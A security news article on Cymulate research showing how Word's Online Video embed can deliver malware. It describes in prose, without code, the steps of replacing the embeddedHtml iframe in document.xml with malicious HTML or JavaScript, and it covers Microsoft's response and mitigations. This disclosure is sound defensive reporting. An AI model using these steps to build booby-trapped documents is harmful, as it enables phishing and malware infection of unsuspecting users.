A feature that allows anyone to embed a video directly in a Word document can be easily misused to trick target users into downloading and running malware, Cymulate researchers have demonstrated.

The attack

Producing a document that will deliver the malicious payload is easy.

An attacker must first create a Word document, fill it with whatever content they deem appropriate, then use the Insert -> Online Video option, add a YouTube video to the document and save the file.

The saved file should then be unpacked with an unpacker or by changing the .docx extension to .zip and unzipping it. These actions allow the attacker to access an XML file called document.xml in the Word folder, to open it and edit it.

Instead of the YouTube iframe code for the video (included after the embeddedHtml parameter), the attacker can choose to put a malicious HTML or JavaScript code, then save the changes, update the .docx package, and find a way to deliver the file to the target and convince them to open the file and click on the embedded video to view it.

The click will trigger the download of the embedded executable by opening Internet Explorer Download Manager. The target will be asked whether they want to run or save the file but won’t be warned about possible dangers of doing so. And, unfortunately, many users don’t think twice about clicking through the prompts and OK-ing the action if their interest is piqued.

“Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden HTML/JavaScript code that will be running in the background and could potentially lead to further code execution scenarios,” Cymulate CTO Avihai Ben-Yossef pointed out.

What now?

The researchers consider this to be a bug and a security flaw and say that it has the potential to impact all users with Office 2016 and older versions of the productivity suite.

Microsoft has been notified of it, but for now they don’t plan to do anything about it as the software is “properly interpreting HTML as designed.”

But if the feature starts getting widely abused they might end up doing something about it.

A similar situation happened last year when, after a considerable increase of malware campaigns abusing the Dynamic Data Exchange (DDE) feature in Word, Microsoft initially said that it was a feature, not a bug, and just offered attack mitigation advice, but ultimately ended up disabling DDE by default to stem the malicious tide.

In the meantime, though, users are advised not to open unsolicited email attachments from unknown or suspicious sources and enterprise administrators to block Word documents containing an embedded video.